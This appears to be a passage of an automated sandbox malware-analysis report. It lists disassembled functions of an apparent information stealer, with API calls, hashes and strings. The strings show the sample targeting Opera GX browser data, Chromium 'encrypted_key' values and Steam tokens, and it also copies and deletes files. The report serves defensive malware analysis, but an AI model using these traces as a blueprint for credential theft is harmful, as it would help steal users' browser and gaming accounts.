                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c13bdc48f24620c1458262451df69a1fa4e50b82ce9a072ad0b58c7c76c57f0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49E08CB1200204BBD7448B99AC8DF8E7BBCDB84711F000235F605D2250E6B4C9848B68
                                                                                                                                                                                                                            Function 0040C931 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,Opera GX,0043684E,0043684B,?,?,?), ref: 0040C964
                                                                                                                                                                                                                              • Part of subcall function 00411D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DD2
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 00411D67: GetFileAttributesA.KERNEL32(?,?,?,0040DA54,?,?,?), ref: 00411D6E
                                                                                                                                                                                                                              • Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC65,?,?), ref: 004081E5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                                                                                                                                                            • String ID: Opera GX
                                                                                                                                                                                                                            • API String ID: 1719890681-3280151751
                                                                                                                                                                                                                            • Opcode ID: b431780a783b4e10edc21815d3fb4ee70557222b56005b66ae2425121522efeb
                                                                                                                                                                                                                            • Instruction ID: 763ddcdae33350dc8d5d809906e0fe4b06c038e7bbc47a4f49a053b12efcf3f0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b431780a783b4e10edc21815d3fb4ee70557222b56005b66ae2425121522efeb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52B1E032D0011DABCF11FBA5DE836DD7775AF04308F51413AF90477192DAB8AE8A8B99
                                                                                                                                                                                                                            Function 00407B0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00407C56,?), ref: 00407B8A
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 544645111-3916222277
                                                                                                                                                                                                                            • Opcode ID: 1e0293ad7fe1b410e6cab7663ead9d675dd73926159e09c2aa2d39085b7e9cd6
                                                                                                                                                                                                                            • Instruction ID: 8b34d31359cbfb98b728bace79fec1a9097574c66fcc9e6a4a6ac37e45fc102e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e0293ad7fe1b410e6cab7663ead9d675dd73926159e09c2aa2d39085b7e9cd6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA119D71908509ABDB20DF94C684BAAB3F4FB00348F144466D641E32C0D33CBE85D75B
                                                                                                                                                                                                                            Function 00416372 Relevance: 3.1, APIs: 2, Instructions: 101stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00411D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DD2
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 004163BA
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?), ref: 004163D8
                                                                                                                                                                                                                              • Part of subcall function 00416013: wsprintfA.USER32 ref: 0041605A
                                                                                                                                                                                                                              • Part of subcall function 00416013: FindFirstFileA.KERNEL32(?,?), ref: 00416071
                                                                                                                                                                                                                              • Part of subcall function 00416013: StrCmpCA.SHLWAPI(?,00436ABC), ref: 00416092
                                                                                                                                                                                                                              • Part of subcall function 00416013: StrCmpCA.SHLWAPI(?,00436AC0), ref: 004160AC
                                                                                                                                                                                                                              • Part of subcall function 00416013: wsprintfA.USER32 ref: 004160D3
                                                                                                                                                                                                                              • Part of subcall function 00416013: StrCmpCA.SHLWAPI(?,00436647), ref: 004160E7
                                                                                                                                                                                                                              • Part of subcall function 00416013: wsprintfA.USER32 ref: 00416104
                                                                                                                                                                                                                              • Part of subcall function 00416013: PathMatchSpecA.SHLWAPI(?,?), ref: 00416131
                                                                                                                                                                                                                              • Part of subcall function 00416013: lstrcatA.KERNEL32(?), ref: 00416167
                                                                                                                                                                                                                              • Part of subcall function 00416013: lstrcatA.KERNEL32(?,00436AD8), ref: 00416179
                                                                                                                                                                                                                              • Part of subcall function 00416013: lstrcatA.KERNEL32(?,?), ref: 0041618C
                                                                                                                                                                                                                              • Part of subcall function 00416013: lstrcatA.KERNEL32(?,00436ADC), ref: 0041619E
                                                                                                                                                                                                                              • Part of subcall function 00416013: lstrcatA.KERNEL32(?,?), ref: 004161B2
                                                                                                                                                                                                                              • Part of subcall function 00416013: wsprintfA.USER32 ref: 0041611B
                                                                                                                                                                                                                              • Part of subcall function 00416013: CopyFileA.KERNEL32(?,?,00000001), ref: 0041626B
                                                                                                                                                                                                                              • Part of subcall function 00416013: DeleteFileA.KERNEL32(?), ref: 004162DF
                                                                                                                                                                                                                              • Part of subcall function 00416013: FindNextFileA.KERNEL32(?,?), ref: 00416341
                                                                                                                                                                                                                              • Part of subcall function 00416013: FindClose.KERNEL32(?), ref: 00416355
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2104210347-0
                                                                                                                                                                                                                            • Opcode ID: 835dc13343e326b6a76b3cdc0f9d4ab798eb5c860badef69680918f873e4cb55
                                                                                                                                                                                                                            • Instruction ID: d98a3d990a7e0a20ac37cc0cb2d99f709dd4f53037528d44a624c8c1945b1035
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 835dc13343e326b6a76b3cdc0f9d4ab798eb5c860badef69680918f873e4cb55
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F431C77280010DAFDF25EFA0DC03EE8777AEB0C309F05149EB609A72A1DA759A909F55
                                                                                                                                                                                                                            Function 00416FF9 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00417040
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: CreateThread.KERNEL32(00000000,00000000,00416E08,?,00000000,00000000), ref: 00416F78
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F80
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • Soft\Steam\steam_tokens.txt, xrefs: 00417050
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                                                                                                                                                            • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                                                                            • API String ID: 502913869-3507145866
                                                                                                                                                                                                                            • Opcode ID: de86626743a9207f6cfc179452c05094693f3bb4c904fe655b6e1b68a8e46c1f
                                                                                                                                                                                                                            • Instruction ID: 8c1449e976d53245424d212d2d9d4a8b7f1f1ffdcc89600b1e8197c73b7b60fb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: de86626743a9207f6cfc179452c05094693f3bb4c904fe655b6e1b68a8e46c1f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8501E171D00119ABCF00FBE6DD478CE7B789E04358F51417AFA0177152DB78AA8987D9
                                                                                                                                                                                                                            Function 00411DF4 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416973,?), ref: 00411E0C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocLocal
                                                                                                                                                                                                                            • String ID: siA
                                                                                                                                                                                                                            • API String ID: 3494564517-470986483
                                                                                                                                                                                                                            • Opcode ID: fb61fe623097888cf65d3814ddf1640f9bdc70486a4c33bd704b3484e22c8f94
                                                                                                                                                                                                                            • Instruction ID: 346925838d3b14811ea8838da46691f13996bcddb0819abdd03295e02f918ba5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb61fe623097888cf65d3814ddf1640f9bdc70486a4c33bd704b3484e22c8f94
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FBE02B3AA017115B87224BFAD8146A7BB5A9FC5B61B08416BEF48CB325C5B5CC4186E4
                                                                                                                                                                                                                            Function 00409043 Relevance: 2.7, APIs: 2, Instructions: 163stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 004091DA
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 004091F5
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2500673778-0
                                                                                                                                                                                                                            • Opcode ID: 74ceda1dc5146a3d248ee6bef9dabb264e20564d52d5b3c0999ba18c777f6916
                                                                                                                                                                                                                            • Instruction ID: 5e98ba300ddcd45cf211863d71e3bafefa6b38d363b0b24e8b0482305e210222
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74ceda1dc5146a3d248ee6bef9dabb264e20564d52d5b3c0999ba18c777f6916
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2E51FF71A00119ABCF01FFA5ED468DE7775AF04309F511026F500B71A2DBB8AE899B99
                                                                                                                                                                                                                            Function 004077F8 Relevance: 2.6, APIs: 2, Instructions: 63memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00407C18,?,?), ref: 0040784A
                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00407874
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                                            • Opcode ID: 05bdf160f8efc9cc43d5322af45abfc495ce26904b45161f00d02fdde4737ff8
                                                                                                                                                                                                                            • Instruction ID: c887a8aab8905174e490e40543d587288c91d689b553aa8af607c42ebbdab75a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 05bdf160f8efc9cc43d5322af45abfc495ce26904b45161f00d02fdde4737ff8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6911B172A04705ABC724CFB8C989B9BB7F4EB40714F24883EE64AE7390D278B940C715
                                                                                                                                                                                                                            Function 0041CBFD Relevance: 2.5, APIs: 2, Instructions: 39COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • malloc.MSVCRT ref: 0041CC0E
                                                                                                                                                                                                                              • Part of subcall function 0041BBB1: lstrlenA.KERNEL32(?,0041CC1F,0041CCC1,00000000,06400000,00000003,00000000,004175C1,.exe,00436C64,00436C60,00436C5C,00436C58,00436C54,00436C50,00436C4C), ref: 0041BBE3
                                                                                                                                                                                                                              • Part of subcall function 0041BBB1: malloc.MSVCRT ref: 0041BBEB
                                                                                                                                                                                                                              • Part of subcall function 0041BBB1: lstrcpyA.KERNEL32(00000000,?), ref: 0041BBF6
                                                                                                                                                                                                                            • malloc.MSVCRT ref: 0041CC4B
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: malloc$lstrcpylstrlen
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2974738957-0
                                                                                                                                                                                                                            • Opcode ID: f9200b95373ff1b7789a744542eff742420212f49676e2a89c92c5c195539ba2
                                                                                                                                                                                                                            • Instruction ID: 8df7538632d2272994aaaaf24c21eca96cdb497c3d92377313da6f1428c14af4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9200b95373ff1b7789a744542eff742420212f49676e2a89c92c5c195539ba2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ABF024726442125BC7206F6AEC819DBBB98EB447A0F054127FE0C97340EA34DC4083F8
